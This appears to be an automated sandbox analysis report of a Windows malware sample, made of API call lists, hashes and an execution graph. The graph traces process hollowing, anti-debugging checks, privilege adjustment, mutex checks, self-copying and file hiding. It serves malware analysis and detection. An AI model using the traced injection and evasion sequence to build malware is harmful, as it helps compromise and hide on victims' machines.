                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction ID: 963f6558a3e8c8fe41807d2d55b1a75cc2718abf8446be7d55abac809a551387
                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction Fuzzy Hash: DD31B87661CAC485D770EB29E8D87AAB3A1F788740F400239DA9D83B68DF3CD554CB20
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                  • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                  • Instruction ID: 799acfa859202b951d01e3b3350b1c2595ae39989276c80c86e364ecaaa21f22
                                                                                                                                                                  • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6601A576618A808AD7A0DB24F88471AB7B4F788794F901239EB8D43B68DF7DC145CB24
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction ID: 4105243a2fe8dc9743df0fdc55b0590d194b3995f690c65414f17ed2bdfe8aeb
                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F11FE71A0CA8681E770EB21E4C836BE3A1FBD4754F90423DD6AD82A98DF7DD504CB60
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38390D
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383922
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383935
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383945
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383958
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38396D
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383980
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383995
                                                                                                                                                                    • Part of subcall function 00007FF79E3846E4: CreateFileW.KERNEL32 ref: 00007FF79E38472B
                                                                                                                                                                    • Part of subcall function 00007FF79E3840E4: GetCurrentProcess.KERNEL32 ref: 00007FF79E38414B
                                                                                                                                                                    • Part of subcall function 00007FF79E3840E4: OpenProcessToken.ADVAPI32 ref: 00007FF79E38415E
                                                                                                                                                                    • Part of subcall function 00007FF79E3840E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF79E384186
                                                                                                                                                                    • Part of subcall function 00007FF79E3840E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF79E3841B1
                                                                                                                                                                    • Part of subcall function 00007FF79E3840E4: CloseHandle.KERNEL32 ref: 00007FF79E3841BC
                                                                                                                                                                    • Part of subcall function 00007FF79E3840E4: OpenProcess.KERNEL32 ref: 00007FF79E3841D1
                                                                                                                                                                    • Part of subcall function 00007FF79E3840E4: CloseHandle.KERNEL32 ref: 00007FF79E384249
                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF79E383037
                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF79E38304A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                  • API String ID: 3992431006-2286007224
                                                                                                                                                                  • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                  • Instruction ID: 1327664bf92a784b0c602038c680800c446212eec788c87f8b0eeec3dbcb1244
                                                                                                                                                                  • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                  • Instruction Fuzzy Hash: F811D670A18A8285E670FB34E8D83AAB7A1FB84744F80413DD55C87665DF7CE0598B70

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:38.5%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                  Total number of Nodes:481
                                                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                                                  execution_graph 1362 7ff7e52b33cc 1365 7ff7e52b2048 GetModuleFileNameW 1362->1365 1366 7ff7e52b20c9 1365->1366 1372 7ff7e52b20c4 1365->1372 1367 7ff7e52b2107 1366->1367 1368 7ff7e52b211d 1366->1368 1369 7ff7e52b2111 1367->1369 1370 7ff7e52b213b 1367->1370 1408 7ff7e52b1f88 ExpandEnvironmentStringsW 1368->1408 1369->1372 1410 7ff7e52b2008 ExpandEnvironmentStringsW 1369->1410 1409 7ff7e52b1fc8 ExpandEnvironmentStringsW 1370->1409 1373 7ff7e52b2132 1373->1372 1376 7ff7e52b218d CreateProcessW 1373->1376 1376->1372 1377 7ff7e52b21e8 CreateFileW 1376->1377 1377->1372 1378 7ff7e52b222f GetFileSize 1377->1378 1379 7ff7e52b2257 CloseHandle 1378->1379 1380 7ff7e52b224d 1378->1380 1379->1372 1380->1379 1381 7ff7e52b2267 VirtualAlloc 1380->1381 1382 7ff7e52b22a1 ReadFile 1381->1382 1383 7ff7e52b2291 CloseHandle 1381->1383 1384 7ff7e52b22f1 CloseHandle GetThreadContext 1382->1384 1385 7ff7e52b22ce VirtualFree CloseHandle 1382->1385 1383->1372 1386 7ff7e52b2341 VirtualFree 1384->1386 1387 7ff7e52b2359 ReadProcessMemory GetModuleHandleA GetProcAddress 1384->1387 1385->1372 1386->1372 1388 7ff7e52b23dc 1387->1388 1389 7ff7e52b23e0 VirtualFree 1388->1389 1390 7ff7e52b23f8 VirtualAllocEx 1388->1390 1389->1372 1391 7ff7e52b2463 VirtualFree 1390->1391 1392 7ff7e52b247b WriteProcessMemory 1390->1392 1391->1372 1393 7ff7e52b24b1 VirtualFree 1392->1393 1395 7ff7e52b24c9 1392->1395 1393->1372 1394 7ff7e52b24ff WriteProcessMemory 1394->1395 1396 7ff7e52b258a VirtualFree 1394->1396 1395->1394 1399 7ff7e52b25a7 1395->1399 1396->1372 1397 7ff7e52b2619 RtlCompareMemory 1397->1399 1400 7ff7e52b266c 1397->1400 1398 7ff7e52b2898 WriteProcessMemory SetThreadContext 1401 7ff7e52b2933 ResumeThread 1398->1401 1402 7ff7e52b291e VirtualFree 1398->1402 1399->1397 1399->1398 1405 7ff7e52b2893 1400->1405 1406 7ff7e52b279c ReadProcessMemory WriteProcessMemory 1400->1406 1403 7ff7e52b2945 VirtualFree 1401->1403 1404 7ff7e52b295a VirtualFree 1401->1404 1402->1372 1403->1372 1404->1372 1405->1398 1406->1400 1407 7ff7e52b2871 VirtualFree 1406->1407 1407->1372 1408->1373 1409->1373 1410->1373 1423 7ff7e52b338c 1424 7ff7e52b2048 36 API calls 1423->1424 1425 7ff7e52b339c 1424->1425 1426 7ff7e52b2f0c CreateMutexA 1427 7ff7e52b2f31 ReleaseMutex CloseHandle 1426->1427 1428 7ff7e52b2f4e GetLastError 1426->1428 1429 7ff7e52b2f90 1427->1429 1430 7ff7e52b2f78 ReleaseMutex CloseHandle 1428->1430 1431 7ff7e52b2f5b ReleaseMutex CloseHandle 1428->1431 1430->1429 1431->1429 1432 7ff7e52b31ec 1433 7ff7e52b31f5 1432->1433 1434 7ff7e52b320e 1433->1434 1437 7ff7e52b306c 1433->1437 1442 7ff7e52b2e6c CreateMutexA 1437->1442 1440 7ff7e52b3087 Sleep CreateThread WaitForSingleObject 1441 7ff7e52b30cc Sleep 1440->1441 1441->1433 1443 7ff7e52b2eb5 GetLastError 1442->1443 1444 7ff7e52b2e98 ReleaseMutex CloseHandle 1442->1444 1446 7ff7e52b2ec2 ReleaseMutex CloseHandle 1443->1446 1447 7ff7e52b2edf ReleaseMutex CloseHandle 1443->1447 1445 7ff7e52b2ef7 1444->1445 1445->1440 1445->1441 1446->1445 1447->1445 838 7ff7e52b345c 897 7ff7e52b10a0 838->897 843 7ff7e52b3474 ExitProcess 844 7ff7e52b347c 1131 7ff7e52b4264 GetCurrentProcess OpenProcessToken 844->1131 848 7ff7e52b3497 849 7ff7e52b34fb 848->849 850 7ff7e52b34ac 848->850 853 7ff7e52b3510 849->853 854 7ff7e52b354c 849->854 1146 7ff7e52b43a4 CreateMutexExA 850->1146 856 7ff7e52b43a4 3 API calls 853->856 860 7ff7e52b3561 854->860 861 7ff7e52b35a2 854->861 855 7ff7e52b34d2 ExitProcess 858 7ff7e52b351c 856->858 857 7ff7e52b43a4 3 API calls 859 7ff7e52b34cb 857->859 862 7ff7e52b3523 ExitProcess 858->862 863 7ff7e52b352b 858->863 859->855 864 7ff7e52b34da 859->864 865 7ff7e52b43a4 3 API calls 860->865 1164 7ff7e52b3a74 861->1164 1159 7ff7e52b327c 863->1159 1150 7ff7e52b32ec 864->1150 869 7ff7e52b356d 865->869 873 7ff7e52b3574 ExitProcess 869->873 874 7ff7e52b357c 869->874 870 7ff7e52b3530 875 7ff7e52b3544 ExitProcess 870->875 876 7ff7e52b3537 Sleep 870->876 872 7ff7e52b34df 878 7ff7e52b34e6 Sleep 872->878 879 7ff7e52b34f3 ExitProcess 872->879 880 7ff7e52b327c 20 API calls 874->880 876->870 878->872 882 7ff7e52b3581 880->882 885 7ff7e52b3595 ExitProcess 882->885 886 7ff7e52b3588 Sleep 882->886 883 7ff7e52b35ba 887 7ff7e52b43a4 3 API calls 883->887 884 7ff7e52b360e 7 API calls 886->882 888 7ff7e52b35c6 887->888 889 7ff7e52b35e0 ExitProcess 888->889 890 7ff7e52b43a4 3 API calls 888->890 891 7ff7e52b35d9 890->891 891->889 892 7ff7e52b35e8 891->892 893 7ff7e52b32ec 47 API calls 892->893 894 7ff7e52b35ed 893->894 895 7ff7e52b3601 ExitProcess 894->895 896 7ff7e52b35f4 Sleep 894->896 896->894 1174 7ff7e52b1000 LoadLibraryA GetProcAddress 897->1174 899 7ff7e52b113a 1175 7ff7e52b1000 LoadLibraryA GetProcAddress 899->1175 901 7ff7e52b1154 1176 7ff7e52b1050 LoadLibraryA GetProcAddress 901->1176 903 7ff7e52b116e 1177 7ff7e52b1050 LoadLibraryA GetProcAddress 903->1177 905 7ff7e52b1188 1178 7ff7e52b1050 LoadLibraryA GetProcAddress 905->1178 907 7ff7e52b11a2 1179 7ff7e52b1050 LoadLibraryA GetProcAddress 907->1179 909 7ff7e52b11bc 1180 7ff7e52b1050 LoadLibraryA GetProcAddress 909->1180 911 7ff7e52b11d6 1181 7ff7e52b1050 LoadLibraryA GetProcAddress 911->1181 913 7ff7e52b11f0 1182 7ff7e52b1050 LoadLibraryA GetProcAddress 913->1182 915 7ff7e52b120a 1183 7ff7e52b1050 LoadLibraryA GetProcAddress 915->1183 917 7ff7e52b1224 1184 7ff7e52b1050 LoadLibraryA GetProcAddress 917->1184 919 7ff7e52b123e 1185 7ff7e52b1000 LoadLibraryA GetProcAddress 919->1185 921 7ff7e52b1258 1186 7ff7e52b1000 LoadLibraryA GetProcAddress 921->1186 923 7ff7e52b1272 1187 7ff7e52b1000 LoadLibraryA GetProcAddress 923->1187 925 7ff7e52b128c 1188 7ff7e52b1000 LoadLibraryA GetProcAddress 925->1188 927 7ff7e52b12a6 1189 7ff7e52b1050 LoadLibraryA GetProcAddress 927->1189 929 7ff7e52b12c0 1190 7ff7e52b1050 LoadLibraryA GetProcAddress 929->1190 931 7ff7e52b12da 1191 7ff7e52b1050 LoadLibraryA GetProcAddress 931->1191 933 7ff7e52b12f4 1192 7ff7e52b1050 LoadLibraryA GetProcAddress 933->1192 935 7ff7e52b130e 1193 7ff7e52b1050 LoadLibraryA GetProcAddress 935->1193 937 7ff7e52b1328 1194 7ff7e52b1050 LoadLibraryA GetProcAddress 937->1194 939 7ff7e52b1342 1195 7ff7e52b1050 LoadLibraryA GetProcAddress 939->1195 941 7ff7e52b135c 1196 7ff7e52b1050 LoadLibraryA GetProcAddress 941->1196 943 7ff7e52b1376 1197 7ff7e52b1050 LoadLibraryA GetProcAddress 943->1197 945 7ff7e52b1390 1198 7ff7e52b1050 LoadLibraryA GetProcAddress 945->1198 947 7ff7e52b13aa 1199 7ff7e52b1050 LoadLibraryA GetProcAddress 947->1199 949 7ff7e52b13c4 1200 7ff7e52b1050 LoadLibraryA GetProcAddress 949->1200 951 7ff7e52b13de 1201 7ff7e52b1050 LoadLibraryA GetProcAddress 951->1201 953 7ff7e52b13f8 1202 7ff7e52b1050 LoadLibraryA GetProcAddress 953->1202 955 7ff7e52b1412 1203 7ff7e52b1050 LoadLibraryA GetProcAddress 955->1203 957 7ff7e52b142c 1204 7ff7e52b1050 LoadLibraryA GetProcAddress 957->1204 959 7ff7e52b1446 1205 7ff7e52b1050 LoadLibraryA GetProcAddress 959->1205 961 7ff7e52b1460 1206 7ff7e52b1050 LoadLibraryA GetProcAddress 961->1206 963 7ff7e52b147a 1207 7ff7e52b1050 LoadLibraryA GetProcAddress 963->1207 965 7ff7e52b1494 1208 7ff7e52b1050 LoadLibraryA GetProcAddress 965->1208 967 7ff7e52b14ae 1209 7ff7e52b1050 LoadLibraryA GetProcAddress 967->1209 969 7ff7e52b14c8 1210 7ff7e52b1050 LoadLibraryA GetProcAddress 969->1210 971 7ff7e52b14e2 1211 7ff7e52b1050 LoadLibraryA GetProcAddress 971->1211 973 7ff7e52b14fc 1212 7ff7e52b1050 LoadLibraryA GetProcAddress 973->1212 975 7ff7e52b1516 1213 7ff7e52b1050 LoadLibraryA GetProcAddress 975->1213 977 7ff7e52b1530 1214 7ff7e52b1050 LoadLibraryA GetProcAddress 977->1214 979 7ff7e52b154a 1215 7ff7e52b1050 LoadLibraryA GetProcAddress 979->1215 981 7ff7e52b1564 1216 7ff7e52b1050 LoadLibraryA GetProcAddress 981->1216 983 7ff7e52b157e 1217 7ff7e52b1050 LoadLibraryA GetProcAddress 983->1217 985 7ff7e52b1598 1218 7ff7e52b1050 LoadLibraryA GetProcAddress 985->1218 987 7ff7e52b15b2 1219 7ff7e52b1050 LoadLibraryA GetProcAddress 987->1219 989 7ff7e52b15cc 1220 7ff7e52b1050 LoadLibraryA GetProcAddress 989->1220 991 7ff7e52b15e6 1221 7ff7e52b1050 LoadLibraryA GetProcAddress 991->1221 993 7ff7e52b1600 1222 7ff7e52b1050 LoadLibraryA GetProcAddress 993->1222 995 7ff7e52b161a 1223 7ff7e52b1050 LoadLibraryA GetProcAddress 995->1223 997 7ff7e52b1634 1224 7ff7e52b1050 LoadLibraryA GetProcAddress 997->1224 999 7ff7e52b164e 1225 7ff7e52b1050 LoadLibraryA GetProcAddress 999->1225 1001 7ff7e52b1668 1226 7ff7e52b1050 LoadLibraryA GetProcAddress 1001->1226 1003 7ff7e52b1682 1227 7ff7e52b1050 LoadLibraryA GetProcAddress 1003->1227 1005 7ff7e52b169c 1228 7ff7e52b1050 LoadLibraryA GetProcAddress 1005->1228 1007 7ff7e52b16b6 1229 7ff7e52b1050 LoadLibraryA GetProcAddress 1007->1229 1009 7ff7e52b16d0 1230 7ff7e52b1050 LoadLibraryA GetProcAddress 1009->1230 1011 7ff7e52b16ea 1231 7ff7e52b1050 LoadLibraryA GetProcAddress 1011->1231 1013 7ff7e52b1704 1232 7ff7e52b1050 LoadLibraryA GetProcAddress 1013->1232 1015 7ff7e52b171e 1233 7ff7e52b1050 LoadLibraryA GetProcAddress 1015->1233 1017 7ff7e52b1738 1234 7ff7e52b1050 LoadLibraryA GetProcAddress 1017->1234 1019 7ff7e52b1752 1235 7ff7e52b1050 LoadLibraryA GetProcAddress 1019->1235 1021 7ff7e52b176c 1236 7ff7e52b1050 LoadLibraryA GetProcAddress 1021->1236 1023 7ff7e52b1786 1237 7ff7e52b1050 LoadLibraryA GetProcAddress 1023->1237 1025 7ff7e52b17a0 1238 7ff7e52b1050 LoadLibraryA GetProcAddress 1025->1238 1027 7ff7e52b17ba 1239 7ff7e52b1050 LoadLibraryA GetProcAddress 1027->1239 1029 7ff7e52b17d4 1240 7ff7e52b1050 LoadLibraryA GetProcAddress 1029->1240 1031 7ff7e52b17ee 1241 7ff7e52b1050 LoadLibraryA GetProcAddress 1031->1241 1033 7ff7e52b1808 1242 7ff7e52b1050 LoadLibraryA GetProcAddress 1033->1242 1035 7ff7e52b1822 1243 7ff7e52b1050 LoadLibraryA GetProcAddress 1035->1243 1037 7ff7e52b183c 1244 7ff7e52b1050 LoadLibraryA GetProcAddress 1037->1244 1039 7ff7e52b1856 1245 7ff7e52b1050 LoadLibraryA GetProcAddress 1039->1245 1041 7ff7e52b1870 1246 7ff7e52b1050 LoadLibraryA GetProcAddress 1041->1246 1043 7ff7e52b188a 1247 7ff7e52b1050 LoadLibraryA GetProcAddress 1043->1247 1045 7ff7e52b18a4 1248 7ff7e52b1050 LoadLibraryA GetProcAddress 1045->1248 1047 7ff7e52b18be 1249 7ff7e52b1050 LoadLibraryA GetProcAddress 1047->1249 1049 7ff7e52b18d8 1250 7ff7e52b1050 LoadLibraryA GetProcAddress 1049->1250 1051 7ff7e52b18f2 1251 7ff7e52b1050 LoadLibraryA GetProcAddress 1051->1251 1053 7ff7e52b190c 1252 7ff7e52b1050 LoadLibraryA GetProcAddress 1053->1252 1055 7ff7e52b1926 1253 7ff7e52b1050 LoadLibraryA GetProcAddress 1055->1253 1057 7ff7e52b1940 1254 7ff7e52b1050 LoadLibraryA GetProcAddress 1057->1254 1059 7ff7e52b195a 1255 7ff7e52b1050 LoadLibraryA GetProcAddress 1059->1255 1061 7ff7e52b1974 1256 7ff7e52b1050 LoadLibraryA GetProcAddress 1061->1256 1063 7ff7e52b198e 1257 7ff7e52b1050 LoadLibraryA GetProcAddress 1063->1257 1065 7ff7e52b19a8 1258 7ff7e52b1050 LoadLibraryA GetProcAddress 1065->1258 1067 7ff7e52b19c2 1259 7ff7e52b1050 LoadLibraryA GetProcAddress 1067->1259 1069 7ff7e52b19dc 1260 7ff7e52b1050 LoadLibraryA GetProcAddress 1069->1260 1071 7ff7e52b19f6 1261 7ff7e52b1050 LoadLibraryA GetProcAddress 1071->1261 1073 7ff7e52b1a10 1262 7ff7e52b1050 LoadLibraryA GetProcAddress 1073->1262 1075 7ff7e52b1a2a 1263 7ff7e52b1050 LoadLibraryA GetProcAddress 1075->1263 1077 7ff7e52b1a44 1264 7ff7e52b1050 LoadLibraryA GetProcAddress 1077->1264 1079 7ff7e52b1a5e 1265 7ff7e52b1050 LoadLibraryA GetProcAddress 1079->1265 1081 7ff7e52b1a78 1266 7ff7e52b1050 LoadLibraryA GetProcAddress 1081->1266 1083 7ff7e52b1a92 1267 7ff7e52b1050 LoadLibraryA GetProcAddress 1083->1267 1085 7ff7e52b1aac 1268 7ff7e52b1050 LoadLibraryA GetProcAddress 1085->1268 1087 7ff7e52b1ac6 1269 7ff7e52b1050 LoadLibraryA GetProcAddress 1087->1269 1089 7ff7e52b1ae0 1270 7ff7e52b1050 LoadLibraryA GetProcAddress 1089->1270 1091 7ff7e52b1afa 1271 7ff7e52b1050 LoadLibraryA GetProcAddress 1091->1271 1093 7ff7e52b1b14 1272 7ff7e52b1050 LoadLibraryA GetProcAddress 1093->1272 1095 7ff7e52b1b2e 1273 7ff7e52b1000 LoadLibraryA GetProcAddress 1095->1273 1097 7ff7e52b1b48 1274 7ff7e52b1050 LoadLibraryA GetProcAddress 1097->1274 1099 7ff7e52b1b62 1275 7ff7e52b1050 LoadLibraryA GetProcAddress 1099->1275 1101 7ff7e52b1b7c 1276 7ff7e52b1050 LoadLibraryA GetProcAddress 1101->1276 1103 7ff7e52b1b96 1277 7ff7e52b1050 LoadLibraryA GetProcAddress 1103->1277 1105 7ff7e52b1bb0 1278 7ff7e52b1050 LoadLibraryA GetProcAddress 1105->1278 1107 7ff7e52b1bca 1279 7ff7e52b1050 LoadLibraryA GetProcAddress 1107->1279 1109 7ff7e52b1be4 1280 7ff7e52b1050 LoadLibraryA GetProcAddress 1109->1280 1111 7ff7e52b1bfe 1281 7ff7e52b1000 LoadLibraryA GetProcAddress 1111->1281 1113 7ff7e52b1c18 1282 7ff7e52b1000 LoadLibraryA GetProcAddress 1113->1282 1115 7ff7e52b1c32 1283 7ff7e52b1050 LoadLibraryA GetProcAddress 1115->1283 1117 7ff7e52b1c4c 1284 7ff7e52b1050 LoadLibraryA GetProcAddress 1117->1284 1119 7ff7e52b1c66 1285 7ff7e52b1050 LoadLibraryA GetProcAddress 1119->1285 1121 7ff7e52b1c80 1286 7ff7e52b1050 LoadLibraryA GetProcAddress 1121->1286 1123 7ff7e52b1c9a 1287 7ff7e52b1050 LoadLibraryA GetProcAddress 1123->1287 1125 7ff7e52b1cb4 1288 7ff7e52b1050 LoadLibraryA GetProcAddress 1125->1288 1127 7ff7e52b1cce 1128 7ff7e52b321c IsDebuggerPresent 1127->1128 1129 7ff7e52b322a 1128->1129 1130 7ff7e52b322e GetCurrentProcess CheckRemoteDebuggerPresent 1128->1130 1129->843 1129->844 1130->1129 1132 7ff7e52b3481 1131->1132 1133 7ff7e52b428a GetTokenInformation 1131->1133 1142 7ff7e52b3ce4 GetModuleFileNameW 1132->1142 1289 7ff7e52b3b54 VirtualAlloc 1133->1289 1135 7ff7e52b42bb GetTokenInformation 1136 7ff7e52b4302 AdjustTokenPrivileges CloseHandle 1135->1136 1137 7ff7e52b42e8 CloseHandle 1135->1137 1290 7ff7e52b3b24 1136->1290 1138 7ff7e52b3b24 VirtualFree 1137->1138 1139 7ff7e52b42fd 1138->1139 1139->1132 1143 7ff7e52b3dd2 wcsncpy 1142->1143 1144 7ff7e52b3d0f PathFindFileNameW wcslen 1142->1144 1145 7ff7e52b3d49 1143->1145 1144->1145 1145->848 1147 7ff7e52b43d0 GetLastError 1146->1147 1148 7ff7e52b34b8 1146->1148 1147->1148 1149 7ff7e52b43dd CloseHandle 1147->1149 1148->855 1148->857 1149->1148 1293 7ff7e52b38c4 1150->1293 1152 7ff7e52b32fd 1296 7ff7e52b46e4 CreateFileW 1152->1296 1154 7ff7e52b3357 CreateThread 1154->872 1155 7ff7e52b3315 1155->1154 1308 7ff7e52b40c4 1155->1308 1160 7ff7e52b38c4 11 API calls 1159->1160 1161 7ff7e52b328c 1160->1161 1347 7ff7e52b44b4 CreateFileW 1161->1347 1165 7ff7e52b3744 3 API calls 1164->1165 1166 7ff7e52b3a9f 1165->1166 1167 7ff7e52b38c4 11 API calls 1166->1167 1168 7ff7e52b3aa9 GetModuleFileNameW DeleteFileW CopyFileW 1167->1168 1169 7ff7e52b35a7 1168->1169 1170 7ff7e52b3aeb SetFileAttributesW 1168->1170 1172 7ff7e52b33ec GetVersionExW 1169->1172 1359 7ff7e52b39b4 RegOpenKeyExW 1170->1359 1173 7ff7e52b341d 1172->1173 1173->883 1173->884 1174->899 1175->901 1176->903 1177->905 1178->907 1179->909 1180->911 1181->913 1182->915 1183->917 1184->919 1185->921 1186->923 1187->925 1188->927 1189->929 1190->931 1191->933 1192->935 1193->937 1194->939 1195->941 1196->943 1197->945 1198->947 1199->949 1200->951 1201->953 1202->955 1203->957 1204->959 1205->961 1206->963 1207->965 1208->967 1209->969 1210->971 1211->973 1212->975 1213->977 1214->979 1215->981 1216->983 1217->985 1218->987 1219->989 1220->991 1221->993 1222->995 1223->997 1224->999 1225->1001 1226->1003 1227->1005 1228->1007 1229->1009 1230->1011 1231->1013 1232->1015 1233->1017 1234->1019 1235->1021 1236->1023 1237->1025 1238->1027 1239->1029 1240->1031 1241->1033 1242->1035 1243->1037 1244->1039 1245->1041 1246->1043 1247->1045 1248->1047 1249->1049 1250->1051 1251->1053 1252->1055 1253->1057 1254->1059 1255->1061 1256->1063 1257->1065 1258->1067 1259->1069 1260->1071 1261->1073 1262->1075 1263->1077 1264->1079 1265->1081 1266->1083 1267->1085 1268->1087 1269->1089 1270->1091 1271->1093 1272->1095 1273->1097 1274->1099 1275->1101 1276->1103 1277->1105 1278->1107 1279->1109 1280->1111 1281->1113 1282->1115 1283->1117 1284->1119 1285->1121 1286->1123 1287->1125 1288->1127 1289->1135 1291 7ff7e52b3b35 